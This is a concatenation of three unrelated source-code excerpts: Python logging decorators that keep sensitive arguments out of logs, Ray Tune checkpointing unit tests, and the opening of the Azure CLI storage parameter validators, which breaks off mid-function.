log.debug('Returning from %s (module %s) (time %s): %s' % (func.__name__, func.__module__, _get_timedelta_str(starttime), str(result)))
return result
except Exception, e:
log.debug('Exception from %s (module %s): %s %s' % (func.__name__, func.__module__, type(e), str(e)))
raise
return do_logging_func_call
@_simple_decorator
def log_function_call_without_return(func):
"""
<Purpose>
Logs when the function is called, along with the arguments, and logs when
the function returns, but doesn't log the return value. Will also log any
exception that is raised.
Be careful when using this to log functions that take sensitive values
(e.g. passwords) as arguments.
"""
# The name "do_logging_func_call" is never seen anywhere but here.
def do_logging_func_call(*args, **kwargs):
_log_call_info(func, args, kwargs)
starttime = datetime.datetime.now()
try:
result = func(*args, **kwargs)
log.debug('Returning from %s (module %s) (time %s): [Not logging return value]' % (func.__name__, func.__module__, _get_timedelta_str(starttime)))
return result
except Exception, e:
log.debug('Exception from %s (module %s): %s %s' % (func.__name__, func.__module__, type(e), str(e)))
raise
return do_logging_func_call
@_simple_decorator
def log_function_call_without_arguments(func):
"""
<Purpose>
Logs when the function is called, without the arguments, and logs when
the function returns, including the return value. Will also log any
exception that is raised.
Be careful when using this to log functions that return sensitive values
(e.g. private keys).
"""
# The name "do_logging_func_call" is never seen anywhere but here.
def do_logging_func_call(*args, **kwargs):
log.debug('Calling: %s (module %s), args: [Not logging], kwargs: [Not logging].' %
(func.__name__, func.__module__))
starttime = datetime.datetime.now()
try:
result = func(*args, **kwargs)
log.debug('Returning from %s (module %s) (time %s): %s' % (func.__name__, func.__module__, _get_timedelta_str(starttime), str(result)))
return result
except Exception, e:
log.debug('Exception from %s (module %s): %s %s' % (func.__name__, func.__module__, type(e), str(e)))
raise
return do_logging_func_call
@_simple_decorator
def log_function_call_and_only_first_argument(func):
"""
<Purpose>
Logs when the function is called, with only the first, and logs when
the function returns, including the return value. Will also log any
exception that is raised.
Be careful when using this to log functions that return sensitive values
(e.g. private keys).
The reason this decorator exists is that there are a handful of functions
that take sensitive data as arguments (like passwords) but they are
not the first argument, and logging the first argument could be useful.
This could probably be accomplished by making a decorator that itself
took arguments about which arguments to log, but that crosses well over
the line of maintainability by people who didn't write the initial code.
"""
# The name "do_logging_func_call" is never seen anywhere but here.
def do_logging_func_call(*args, **kwargs):
log.debug('Calling: %s (module %s), 1st arg: %s, other args: [Not logging].' %
(func.__name__, func.__module__, str(_get_cleaned_args(args)[0])))
starttime = datetime.datetime.now()
try:
result = func(*args, **kwargs)
log.debug('Returning from %s (module %s) (time %s): %s' % (func.__name__, func.__module__, _get_timedelta_str(starttime), str(result)))
return result
except Exception, e:
log.debug('Exception from %s (module %s): %s %s' % (func.__name__, func.__module__, type(e), str(e)))
raise
return do_logging_func_call
@_simple_decorator
def log_function_call_without_first_argument(func):
"""
<Purpose>
Logs the function called without the first argument (unless it's a kwarg),
and logs when the function returns including the return value. Will also log
any exception that is raised.
Be careful when using this to log functions that return sensitive values
(e.g. private keys).
The reason this decorator exists is that there are functions that take
a sensitive value (such as the backend authcode) as the first argument,
and we don't want that ending up in the logs.
"""
# The name "do_logging_func_call" is never seen anywhere but here.
def do_logging_func_call(*args, **kwargs):
log.debug('Calling: %s (module %s), 1st arg: [Not logging], other args: %s, kwargs: %s.' %
(func.__name__, func.__module__, str(_get_cleaned_args(args)[1:]), str(_get_cleaned_args(kwargs))))
starttime = datetime.datetime.now()
try:
result = func(*args, **kwargs)
log.debug('Returning from %s (module %s) (time %s): %s' % (func.__name__, func.__module__, _get_timedelta_str(starttime), str(result)))
return result
except Exception, e:
log.debug('Exception from %s (module %s): %s %s' % (func.__name__, func.__module__, type(e), str(e)))
raise
return do_logging_func_call
def _log_call_info(func, args, kwargs):
# This is a separate function because I didn't want to repeat it the code in
# both log_function_call and log_function_call_without_return.
# TODO: clean up this line
log.debug('Calling: %s (module %s), args: %s, kwargs: %s.' %
(func.__name__, func.__module__, str(_get_cleaned_args(args)), str(_get_cleaned_args(kwargs))))
def _get_cleaned_args(args):
cleanedargslist = []
for item in args:
if isinstance(item, HttpRequest):
cleanedargslist.append("<HttpRequest>")
else:
cleanedargslist.append(item)
return tuple(cleanedargslist)
def _get_cleaned_kwargs(kwargs):
cleanedkwargs = {}
for key in kwargs:
if isinstance(kwargs[key], HttpRequest):
cleanedkwargs[key] = "<HttpRequest>"
elif key == "password":
cleanedkwargs[key] = "***"
else:
cleanedkwargs[key] = kwargs[key]
return cleanedkwargs
|
|
import json
import os
import sys
import shutil
import tempfile
import unittest
import ray
from ray.rllib import _register_all
from ray import tune
from ray.tune.logger import NoopLogger
from ray.tune.utils.placement_groups import PlacementGroupFactory
from ray.tune.utils.trainable import TrainableUtil
from ray.tune.function_runner import with_parameters, wrap_function, FuncCheckpointUtil
from ray.tune.result import DEFAULT_METRIC, TRAINING_ITERATION
from ray.tune.schedulers import ResourceChangingScheduler
def creator_generator(logdir):
def logger_creator(config):
return NoopLogger(config, logdir)
return logger_creator
class FuncCheckpointUtilTest(unittest.TestCase):
def setUp(self):
self.logdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.logdir)
def testEmptyCheckpoint(self):
checkpoint_dir = FuncCheckpointUtil.mk_null_checkpoint_dir(self.logdir)
assert FuncCheckpointUtil.is_null_checkpoint(checkpoint_dir)
def testTempCheckpointDir(self):
checkpoint_dir = FuncCheckpointUtil.mk_temp_checkpoint_dir(self.logdir)
assert FuncCheckpointUtil.is_temp_checkpoint_dir(checkpoint_dir)
def testConvertTempToPermanent(self):
checkpoint_dir = FuncCheckpointUtil.mk_temp_checkpoint_dir(self.logdir)
new_checkpoint_dir = FuncCheckpointUtil.create_perm_checkpoint(
checkpoint_dir, self.logdir, step=4
)
assert new_checkpoint_dir == TrainableUtil.find_checkpoint_dir(
new_checkpoint_dir
)
assert os.path.exists(new_checkpoint_dir)
assert not FuncCheckpointUtil.is_temp_checkpoint_dir(new_checkpoint_dir)
tmp_checkpoint_dir = FuncCheckpointUtil.mk_temp_checkpoint_dir(self.logdir)
assert tmp_checkpoint_dir != new_checkpoint_dir
class FunctionCheckpointingTest(unittest.TestCase):
def setUp(self):
self.logdir = tempfile.mkdtemp()
self.logger_creator = creator_generator(self.logdir)
def tearDown(self):
shutil.rmtree(self.logdir)
def testCheckpointReuse(self):
"""Test that repeated save/restore never reuses same checkpoint dir."""
def train(config, checkpoint_dir=None):
if checkpoint_dir:
count = sum(
"checkpoint-" in path for path in os.listdir(checkpoint_dir)
)
assert count == 1, os.listdir(checkpoint_dir)
for step in range(20):
with tune.checkpoint_dir(step=step) as checkpoint_dir:
path = os.path.join(checkpoint_dir, "checkpoint-{}".format(step))
open(path, "a").close()
tune.report(test=step)
wrapped = wrap_function(train)
checkpoint = None
for i in range(5):
new_trainable = wrapped(logger_creator=self.logger_creator)
if checkpoint:
new_trainable.restore(checkpoint)
for i in range(2):
result = new_trainable.train()
checkpoint = new_trainable.save()
new_trainable.stop()
assert result[TRAINING_ITERATION] == 10
def testCheckpointReuseObject(self):
"""Test that repeated save/restore never reuses same checkpoint dir."""
def train(config, checkpoint_dir=None):
if checkpoint_dir:
count = sum(
"checkpoint-" in path for path in os.listdir(checkpoint_dir)
)
assert count == 1, os.listdir(checkpoint_dir)
for step in range(20):
with tune.checkpoint_dir(step=step) as checkpoint_dir:
path = os.path.join(checkpoint_dir, "checkpoint-{}".format(step))
open(path, "a").close()
tune.report(test=step)
wrapped = wrap_function(train)
checkpoint = None
for i in range(5):
new_trainable = wrapped(logger_creator=self.logger_creator)
if checkpoint:
new_trainable.restore_from_object(checkpoint)
for i in range(2):
result = new_trainable.train()
checkpoint = new_trainable.save_to_object()
new_trainable.stop()
self.assertTrue(result[TRAINING_ITERATION] == 10)
def testCheckpointReuseObjectWithoutTraining(self):
"""Test that repeated save/restore never reuses same checkpoint dir."""
def train(config, checkpoint_dir=None):
if checkpoint_dir:
count = sum(
"checkpoint-" in path for path in os.listdir(checkpoint_dir)
)
assert count == 1, os.listdir(checkpoint_dir)
for step in range(20):
with tune.checkpoint_dir(step=step) as checkpoint_dir:
path = os.path.join(checkpoint_dir, "checkpoint-{}".format(step))
open(path, "a").close()
tune.report(test=step)
wrapped = wrap_function(train)
new_trainable = wrapped(logger_creator=self.logger_creator)
for i in range(2):
result = new_trainable.train()
checkpoint = new_trainable.save_to_object()
new_trainable.stop()
new_trainable2 = wrapped(logger_creator=self.logger_creator)
new_trainable2.restore_from_object(checkpoint)
new_trainable2.stop()
new_trainable2 = wrapped(logger_creator=self.logger_creator)
new_trainable2.restore_from_object(checkpoint)
result = new_trainable2.train()
new_trainable2.stop()
self.assertTrue(result[TRAINING_ITERATION] == 3)
def testReuseNullCheckpoint(self):
def train(config, checkpoint_dir=None):
assert not checkpoint_dir
for step in range(10):
tune.report(test=step)
# Create checkpoint
wrapped = wrap_function(train)
checkpoint = None
new_trainable = wrapped(logger_creator=self.logger_creator)
new_trainable.train()
checkpoint = new_trainable.save()
new_trainable.stop()
# Use the checkpoint a couple of times
for i in range(3):
new_trainable = wrapped(logger_creator=self.logger_creator)
new_trainable.restore(checkpoint)
new_trainable.stop()
# Make sure the result is still good
new_trainable = wrapped(logger_creator=self.logger_creator)
new_trainable.restore(checkpoint)
result = new_trainable.train()
checkpoint = new_trainable.save()
new_trainable.stop()
self.assertTrue(result[TRAINING_ITERATION] == 1)
def testMultipleNullCheckpoints(self):
def train(config, checkpoint_dir=None):
assert not checkpoint_dir
for step in range(10):
tune.report(test=step)
wrapped = wrap_function(train)
checkpoint = None
for i in range(5):
new_trainable = wrapped(logger_creator=self.logger_creator)
if checkpoint:
new_trainable.restore(checkpoint)
result = new_trainable.train()
checkpoint = new_trainable.save()
new_trainable.stop()
self.assertTrue(result[TRAINING_ITERATION] == 1)
def testMultipleNullMemoryCheckpoints(self):
def train(config, checkpoint_dir=None):
assert not checkpoint_dir
for step in range(10):
tune.report(test=step)
wrapped = wrap_function(train)
checkpoint = None
for i in range(5):
new_trainable = wrapped(logger_creator=self.logger_creator)
if checkpoint:
new_trainable.restore_from_object(checkpoint)
result = new_trainable.train()
checkpoint = new_trainable.save_to_object()
new_trainable.stop()
assert result[TRAINING_ITERATION] == 1
def testFunctionNoCheckpointing(self):
def train(config, checkpoint_dir=None):
if checkpoint_dir:
assert os.path.exists(checkpoint_dir)
for step in range(10):
tune.report(test=step)
wrapped = wrap_function(train)
new_trainable = wrapped(logger_creator=self.logger_creator)
result = new_trainable.train()
checkpoint = new_trainable.save()
new_trainable.stop()
new_trainable2 = wrapped(logger_creator=self.logger_creator)
new_trainable2.restore(checkpoint)
result = new_trainable2.train()
self.assertEqual(result[TRAINING_ITERATION], 1)
checkpoint = new_trainable2.save()
new_trainable2.stop()
def testFunctionRecurringSave(self):
"""This tests that save and restore are commutative."""
def train(config, checkpoint_dir=None):
if checkpoint_dir:
assert os.path.exists(checkpoint_dir)
for step in range(10):
if step % 3 == 0:
with tune.checkpoint_dir(step=step) as checkpoint_dir:
path = os.path.join(checkpoint_dir, "checkpoint")
with open(path, "w") as f:
f.write(json.dumps({"step": step}))
tune.report(test=step)
wrapped = wrap_function(train)
new_trainable = wrapped(logger_creator=self.logger_creator)
new_trainable.train()
checkpoint_obj = new_trainable.save_to_object()
new_trainable.restore_from_object(checkpoint_obj)
checkpoint = new_trainable.save()
new_trainable.stop()
new_trainable2 = wrapped(logger_creator=self.logger_creator)
new_trainable2.restore(checkpoint)
new_trainable2.train()
new_trainable2.stop()
def testFunctionImmediateSave(self):
"""This tests that save and restore are commutative."""
def train(config, checkpoint_dir=None):
if checkpoint_dir:
assert os.path.exists(checkpoint_dir)
for step in range(10):
with tune.checkpoint_dir(step=step) as checkpoint_dir:
print(checkpoint_dir)
path = os.path.join(checkpoint_dir, "checkpoint-{}".format(step))
open(path, "w").close()
tune.report(test=step)
wrapped = wrap_function(train)
new_trainable = wrapped(logger_creator=self.logger_creator)
new_trainable.train()
new_trainable.train()
checkpoint_obj = new_trainable.save_to_object()
new_trainable.stop()
new_trainable2 = wrapped(logger_creator=self.logger_creator)
new_trainable2.restore_from_object(checkpoint_obj)
checkpoint_obj = new_trainable2.save_to_object()
new_trainable2.train()
result = new_trainable2.train()
assert sum("tmp" in path for path in os.listdir(self.logdir)) == 1
new_trainable2.stop()
assert sum("tmp" in path for path in os.listdir(self.logdir)) == 0
assert result[TRAINING_ITERATION] == 4
class FunctionApiTest(unittest.TestCase):
def setUp(self):
ray.init(num_cpus=4, num_gpus=0, object_store_memory=150 * 1024 * 1024)
def tearDown(self):
ray.shutdown()
_register_all() # re-register the evicted objects
def testCheckpointError(self):
def train(config, checkpoint_dir=False):
pass
with self.assertRaises(ValueError):
tune.run(train, checkpoint_freq=1)
with self.assertRaises(ValueError):
tune.run(train, checkpoint_at_end=True)
def testCheckpointFunctionAtEnd(self):
def train(config, checkpoint_dir=False):
for i in range(10):
tune.report(test=i)
with tune.checkpoint_dir(step=10) as checkpoint_dir:
checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
with open(checkpoint_path, "w") as f:
f.write("hello")
[trial] = tune.run(train).trials
assert os.path.exists(os.path.join(trial.checkpoint.value, "ckpt.log"))
def testCheckpointFunctionAtEndContext(self):
def train(config, checkpoint_dir=False):
for i in range(10):
tune.report(test=i)
with tune.checkpoint_dir(step=10) as checkpoint_dir:
checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
with open(checkpoint_path, "w") as f:
f.write("hello")
[trial] = tune.run(train).trials
assert os.path.exists(os.path.join(trial.checkpoint.value, "ckpt.log"))
def testVariousCheckpointFunctionAtEnd(self):
def train(config, checkpoint_dir=False):
for i in range(10):
with tune.checkpoint_dir(step=i) as checkpoint_dir:
checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
with open(checkpoint_path, "w") as f:
f.write("hello")
tune.report(test=i)
with tune.checkpoint_dir(step=i) as checkpoint_dir:
checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log2")
with open(checkpoint_path, "w") as f:
f.write("goodbye")
[trial] = tune.run(train, keep_checkpoints_num=3).trials
assert os.path.exists(os.path.join(trial.checkpoint.value, "ckpt.log2"))
def testReuseCheckpoint(self):
def train(config, checkpoint_dir=None):
itr = 0
if checkpoint_dir:
with open(os.path.join(checkpoint_dir, "ckpt.log"), "r") as f:
itr = int(f.read()) + 1
for i in range(itr, config["max_iter"]):
with tune.checkpoint_dir(step=i) as checkpoint_dir:
checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
with open(checkpoint_path, "w") as f:
f.write(str(i))
tune.report(test=i, training_iteration=i)
[trial] = tune.run(
train,
config={"max_iter": 5},
).trials
last_ckpt = trial.checkpoint.value
assert os.path.exists(os.path.join(trial.checkpoint.value, "ckpt.log"))
analysis = tune.run(train, config={"max_iter": 10}, restore=last_ckpt)
trial_dfs = list(analysis.trial_dataframes.values())
assert len(trial_dfs[0]["training_iteration"]) == 5
def testRetry(self):
def train(config, checkpoint_dir=None):
restored = bool(checkpoint_dir)
itr = 0
if checkpoint_dir:
with open(os.path.join(checkpoint_dir, "ckpt.log"), "r") as f:
itr = int(f.read()) + 1
for i in range(itr, 10):
if i == 5 and not restored:
raise Exception("try to fail me")
with tune.checkpoint_dir(step=i) as checkpoint_dir:
checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
with open(checkpoint_path, "w") as f:
f.write(str(i))
tune.report(test=i, training_iteration=i)
analysis = tune.run(train, max_failures=3)
last_ckpt = analysis.trials[0].checkpoint.value
assert os.path.exists(os.path.join(last_ckpt, "ckpt.log"))
trial_dfs = list(analysis.trial_dataframes.values())
assert len(trial_dfs[0]["training_iteration"]) == 10
def testEnabled(self):
def train(config, checkpoint_dir=None):
is_active = tune.is_session_enabled()
result = {"active": is_active}
if is_active:
tune.report(**result)
return result
assert train({})["active"] is False
analysis = tune.run(train)
t = analysis.trials[0]
assert t.last_result["active"], t.last_result
def testBlankCheckpoint(self):
def train(config, checkpoint_dir=None):
restored = bool(checkpoint_dir)
itr = 0
if checkpoint_dir:
with open(os.path.join(checkpoint_dir, "ckpt.log"), "r") as f:
itr = int(f.read()) + 1
for i in range(itr, 10):
if i == 5 and not restored:
raise Exception("try to fail me")
with tune.checkpoint_dir(step=itr) as checkpoint_dir:
checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
with open(checkpoint_path, "w") as f:
f.write(str(i))
tune.report(test=i, training_iteration=i)
analysis = tune.run(train, max_failures=3)
trial_dfs = list(analysis.trial_dataframes.values())
assert len(trial_dfs[0]["training_iteration"]) == 10
def testWithParameters(self):
class Data:
def __init__(self):
self.data = [0] * 500_000
data = Data()
data.data[100] = 1
def train(config, data=None):
data.data[101] = 2 # Changes are local
tune.report(metric=len(data.data), hundred=data.data[100])
trial_1, trial_2 = tune.run(
with_parameters(train, data=data), num_samples=2
).trials
self.assertEqual(data.data[101], 0)
self.assertEqual(trial_1.last_result["metric"], 500_000)
self.assertEqual(trial_1.last_result["hundred"], 1)
self.assertEqual(trial_2.last_result["metric"], 500_000)
self.assertEqual(trial_2.last_result["hundred"], 1)
self.assertTrue(str(trial_1).startswith("train_"))
# With checkpoint dir parameter
def train(config, checkpoint_dir="DIR", data=None):
data.data[101] = 2 # Changes are local
tune.report(metric=len(data.data), cp=checkpoint_dir)
trial_1, trial_2 = tune.run(
with_parameters(train, data=data), num_samples=2
).trials
self.assertEqual(data.data[101], 0)
self.assertEqual(trial_1.last_result["metric"], 500_000)
self.assertEqual(trial_1.last_result["cp"], "DIR")
self.assertEqual(trial_2.last_result["metric"], 500_000)
self.assertEqual(trial_2.last_result["cp"], "DIR")
self.assertTrue(str(trial_1).startswith("train_"))
def testWithParameters2(self):
class Data:
def __init__(self):
import numpy as np
self.data = np.random.rand((2 * 1024 * 1024))
def train(config, data=None):
tune.report(metric=len(data.data))
trainable = tune.with_parameters(train, data=Data())
# ray.cloudpickle will crash for some reason
import cloudpickle as cp
dumped = cp.dumps(trainable)
assert sys.getsizeof(dumped) < 100 * 1024
def testNewResources(self):
sched = ResourceChangingScheduler(
resources_allocation_function=(
lambda a, b, c, d: PlacementGroupFactory([{"CPU": 2}])
)
)
def train(config, checkpoint_dir=None):
tune.report(metric=1, resources=tune.get_trial_resources())
analysis = tune.run(
train,
scheduler=sched,
stop={"training_iteration": 2},
resources_per_trial=PlacementGroupFactory([{"CPU": 1}]),
num_samples=1,
)
results_list = list(analysis.results.values())
assert results_list[0]["resources"].head_cpus == 2.0
def testWithParametersTwoRuns1(self):
# Makes sure two runs in the same script but different ray sessions
# pass (https://github.com/ray-project/ray/issues/16609)
def train_fn(config, extra=4):
tune.report(metric=extra)
trainable = tune.with_parameters(train_fn, extra=8)
out = tune.run(trainable, metric="metric", mode="max")
self.assertEqual(out.best_result["metric"], 8)
self.tearDown()
self.setUp()
def train_fn_2(config, extra=5):
tune.report(metric=extra)
trainable = tune.with_parameters(train_fn_2, extra=9)
out = tune.run(trainable, metric="metric", mode="max")
self.assertEqual(out.best_result["metric"], 9)
def testWithParametersTwoRuns2(self):
# Makes sure two runs in the same script
# pass (https://github.com/ray-project/ray/issues/16609)
def train_fn(config, extra=4):
tune.report(metric=extra)
def train_fn_2(config, extra=5):
tune.report(metric=extra)
trainable1 = tune.with_parameters(train_fn, extra=8)
trainable2 = tune.with_parameters(train_fn_2, extra=9)
out1 = tune.run(trainable1, metric="metric", mode="max")
out2 = tune.run(trainable2, metric="metric", mode="max")
self.assertEqual(out1.best_result["metric"], 8)
self.assertEqual(out2.best_result["metric"], 9)
def testReturnAnonymous(self):
def train(config):
return config["a"]
trial_1, trial_2 = tune.run(
train, config={"a": tune.grid_search([4, 8])}
).trials
self.assertEqual(trial_1.last_result[DEFAULT_METRIC], 4)
self.assertEqual(trial_2.last_result[DEFAULT_METRIC], 8)
def testReturnSpecific(self):
def train(config):
return {"m": config["a"]}
trial_1, trial_2 = tune.run(
train, config={"a": tune.grid_search([4, 8])}
).trials
self.assertEqual(trial_1.last_result["m"], 4)
self.assertEqual(trial_2.last_result["m"], 8)
def testYieldAnonymous(self):
def train(config):
for i in range(10):
yield config["a"] + i
trial_1, trial_2 = tune.run(
train, config={"a": tune.grid_search([4, 8])}
).trials
self.assertEqual(trial_1.last_result[DEFAULT_METRIC], 4 + 9)
self.assertEqual(trial_2.last_result[DEFAULT_METRIC], 8 + 9)
def testYieldSpecific(self):
def train(config):
for i in range(10):
yield {"m": config["a"] + i}
trial_1, trial_2 = tune.run(
train, config={"a": tune.grid_search([4, 8])}
).trials
self.assertEqual(trial_1.last_result["m"], 4 + 9)
self.assertEqual(trial_2.last_result["m"], 8 + 9)
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=protected-access
import argparse
from azure.cli.core.commands.validators import validate_key_value_pairs
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.command_modules.storage._client_factory import (get_storage_data_service_client,
blob_data_service_factory,
file_data_service_factory,
storage_client_factory)
from azure.cli.command_modules.storage.util import glob_files_locally, guess_content_type
from azure.cli.command_modules.storage.sdkutil import get_table_data_type
from azure.cli.command_modules.storage.url_quote_util import encode_for_url
from azure.cli.command_modules.storage.oauth_token_util import TokenUpdater
from knack.log import get_logger
from knack.util import CLIError
storage_account_key_options = {'primary': 'key1', 'secondary': 'key2'}
logger = get_logger(__name__)
# Utilities
# pylint: disable=inconsistent-return-statements,too-many-lines
def _query_account_key(cli_ctx, account_name):
"""Query the storage account key. This is used when the customer doesn't offer account key but name."""
rg, scf = _query_account_rg(cli_ctx, account_name)
t_storage_account_keys = get_sdk(
cli_ctx, ResourceType.MGMT_STORAGE, 'models.storage_account_keys#StorageAccountKeys')
logger.debug('Disable HTTP logging to avoid having storage keys in debug logs')
if t_storage_account_keys:
return scf.storage_accounts.list_keys(rg, account_name, logging_enable=False).key1
# of type: models.storage_account_list_keys_result#StorageAccountListKeysResult
return scf.storage_accounts.list_keys(rg, account_name, logging_enable=False).keys[0].value # pylint: disable=no-member
def _query_account_rg(cli_ctx, account_name):
"""Query the storage account's resource group, which the mgmt sdk requires."""
scf = storage_client_factory(cli_ctx)
acc = next((x for x in scf.storage_accounts.list() if x.name == account_name), None)
if acc:
from msrestazure.tools import parse_resource_id
return parse_resource_id(acc.id)['resource_group'], scf
raise ValueError("Storage account '{}' not found.".format(account_name))
def _create_token_credential(cli_ctx):
from knack.cli import EVENT_CLI_POST_EXECUTE
TokenCredential = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#TokenCredential')
token_credential = TokenCredential()
updater = TokenUpdater(token_credential, cli_ctx)
def _cancel_timer_event_handler(_, **__):
updater.cancel()
cli_ctx.register_event(EVENT_CLI_POST_EXECUTE, _cancel_timer_event_handler)
return token_credential
# region PARAMETER VALIDATORS
def parse_storage_account(cmd, namespace):
"""Parse storage account which can be either account name or account id"""
from msrestazure.tools import parse_resource_id, is_valid_resource_id
if namespace.account_name and is_valid_resource_id(namespace.account_name):
namespace.resource_group_name = parse_resource_id(namespace.account_name)['resource_group']
namespace.account_name = parse_resource_id(namespace.account_name)['name']
elif namespace.account_name and not is_valid_resource_id(namespace.account_name) and \
not namespace.resource_group_name:
namespace.resource_group_name = _query_account_rg(cmd.cli_ctx, namespace.account_name)[0]
def process_resource_group(cmd, namespace):
"""Processes the resource group parameter from the account name"""
if namespace.account_name and not namespace.resource_group_name:
namespace.resource_group_name = _query_account_rg(cmd.cli_ctx, namespace.account_name)[0]
def validate_table_payload_format(cmd, namespace):
t_table_payload = get_table_data_type(cmd.cli_ctx, 'table', 'TablePayloadFormat')
if namespace.accept:
formats = {
'none': t_table_payload.JSON_NO_METADATA,
'minimal': t_table_payload.JSON_MINIMAL_METADATA,
'full': t_table_payload.JSON_FULL_METADATA
}
namespace.accept = formats[namespace.accept.lower()]
def validate_bypass(namespace):
if namespace.bypass:
namespace.bypass = ', '.join(namespace.bypass) if isinstance(namespace.bypass, list) else namespace.bypass
def get_config_value(cmd, section, key, default):
return cmd.cli_ctx.config.get(section, key, default)
def is_storagev2(import_prefix):
return import_prefix.startswith('azure.multiapi.storagev2.')
def validate_client_parameters(cmd, namespace):
""" Retrieves storage connection parameters from environment variables and parses out connection string into
account name and key """
n = namespace
if hasattr(n, 'auth_mode'):
auth_mode = n.auth_mode or get_config_value(cmd, 'storage', 'auth_mode', None)
del n.auth_mode
if not n.account_name:
n.account_name = get_config_value(cmd, 'storage', 'account', None)
if auth_mode == 'login':
prefix = cmd.command_kwargs['resource_type'].value[0]
# is_storagv2() is used to distinguish if the command is in track2 SDK
# If yes, we will use get_login_credentials() as token credential
if is_storagev2(prefix):
from azure.cli.core._profile import Profile
profile = Profile(cli_ctx=cmd.cli_ctx)
n.token_credential, _, _ = profile.get_login_credentials(subscription_id=n._subscription)
# Otherwise, we will assume it is in track1 and keep previous token updater
else:
n.token_credential = _create_token_credential(cmd.cli_ctx)
if hasattr(n, 'token_credential') and n.token_credential:
# give warning if there are account key args being ignored
account_key_args = [n.account_key and "--account-key", n.sas_token and "--sas-token",
n.connection_string and "--connection-string"]
account_key_args = [arg for arg in account_key_args if arg]
if account_key_args:
logger.warning('In "login" auth mode, the following arguments are ignored: %s',
' ,'.join(account_key_args))
return
if not n.connection_string:
n.connection_string = get_config_value(cmd, 'storage', 'connection_string', None)
# if connection string supplied or in environment variables, extract account key and name
if n.connection_string:
conn_dict = validate_key_value_pairs(n.connection_string)
n.account_name = conn_dict.get('AccountName')
n.account_key = conn_dict.get('AccountKey')
n.sas_token = conn_dict.get('SharedAccessSignature')
# otherwise, simply try to retrieve the remaining variables from environment variables
if not n.account_name:
n.account_name = get_config_value(cmd, 'storage', 'account', None)
if not n.account_key:
n.account_key = get_config_value(cmd, 'storage', 'key', None)
if not n.sas_token:
n.sas_token = get_config_value(cmd, 'storage', 'sas_token', None)
# strip the '?' from sas token. the portal and command line are returns sas token in different
# forms
if n.sas_token:
n.sas_token = n.sas_token.lstrip('?')
# if account name is specified but no key, attempt to query
if n.account_name and not n.account_key and not n.sas_token:
logger.warning('There are no credentials provided in your command and environment, we will query for the '
'account key inside your storage account. \nPlease provide --connection-string, '
'--account-key or --sas-token as credentials, or use `--auth-mode login` if you '
'have required RBAC roles in your command. For more information about RBAC roles '
'in storage, visit '
'https://docs.microsoft.com/azure/storage/common/storage-auth-aad-rbac-cli. \n'
'Setting the corresponding environment variables can avoid inputting credentials in '
'your command. Please use --help to get more information.')
n.account_key = _query_account_key(cmd.cli_ctx, n.account_name)
def validate_encryption_key(cmd, namespace):
encryption_key_source = cmd.get_models('EncryptionScopeSource', resource_type=ResourceType.MGMT_STORAGE)
if namespace.key_source == encryption_key_source.microsoft_key_vault and \
not namespace.key_uri:
raise CLIError("usage error: Please specify --key-uri when using {} as key source."
.format(encryption_key_source.microsoft_key_vault))
if namespace.key_source != encryption_key_source.microsoft_key_vault and namespace.key_uri:
raise CLIError("usage error: Specify `--key-source={}` and --key-uri to configure key vault properties."
.format(encryption_key_source.microsoft_key_vault))
def process_blob_source_uri(cmd, namespace):
"""
Validate the parameters referenced to a blob source and create the source URI from them.
"""
from .util import create_short_lived_blob_sas
usage_string = \
'Invalid usage: {}. Supply only one of the following argument sets to specify source:' \
'\n\t --source-uri' \
'\n\tOR --source-container --source-blob --source-snapshot [--source-account-name & sas] ' \
'\n\tOR --source-container --source-blob --source-snapshot [--source-account-name & key] '
ns = vars(namespace)
# source as blob
container = ns.pop('source_container', None)
blob = ns.pop('source_blob', None)
snapshot = ns.pop('source_snapshot', None)
# source credential clues
source_account_name = ns.pop('source_account_name', None)
source_account_key = ns.pop('source_account_key', None)
sas = ns.pop('source_sas', None)
# source in the form of an uri
uri = ns.get('copy_source', None)
if uri:
if any([container, blob, sas, snapshot, source_account_name, source_account_key]):
raise ValueError(usage_string.format('Unused parameters are given in addition to the '
'source URI'))
# simplest scenario--no further processing necessary
return
validate_client_parameters(cmd, namespace) # must run first to resolve storage account
# determine if the copy will happen in the same storage account
if not source_account_name and source_account_key:
raise ValueError(usage_string.format('Source account key is given but account name is not'))
if not source_account_name and not source_account_key:
# neither source account name or key is given, assume that user intends to copy blob in
# the same account
source_account_name = ns.get('account_name', None)
source_account_key = ns.get('account_key', None)
elif source_account_name and not source_account_key:
if source_account_name == ns.get('account_name', None):
# the source account name is same as the destination account name
source_account_key = ns.get('account_key', None)
else:
# the source account is different from destination account but the key is missing
# try to query one.
try:
source_account_key = _query_account_key(cmd.cli_ctx, source_account_name)
except ValueError:
raise ValueError('Source storage account {} not found.'.format(source_account_name))
# else: both source account name and key are given by user
if not source_account_name:
raise ValueError(usage_string.format('Storage account name not found'))
if not sas:
sas = create_short_lived_blob_sas(cmd, source_account_name, source_account_key, container, blob)
query_params = []
if sas:
query_params.append(sas)
if snapshot:
query_params.append('snapshot={}'.format(snapshot))
uri = 'https://{}.blob.{}/{}/{}{}{}'.format(source_account_name,
cmd.cli_ctx.cloud.suffixes.storage_endpoint,
container,
blob,
'?' if query_params else '',
'&'.join(query_params))
namespace.copy_source = uri
def validate_source_uri(cmd, namespace): # pylint: disable=too-many-statements
from .util import create_short_lived_blob_sas, create_short_lived_file_sas
usage_string = \
'Invalid usage: {}. Supply only one of the following argument sets to specify source:' \
'\n\t --source-uri [--source-sas]' \
'\n\tOR --source-container --source-blob [--source-account-name & sas] [--source-snapshot]' \
'\n\tOR --source-container --source-blob [--source-account-name & key] [--source-snapshot]' \
'\n\tOR --source-share --source-path' \
'\n\tOR --source-share --source-path [--source-account-name & sas]' \
'\n\tOR --source-share --source-path [--source-account-name & key]'
ns = vars(namespace)
# source as blob
container = ns.pop('source_container', None)
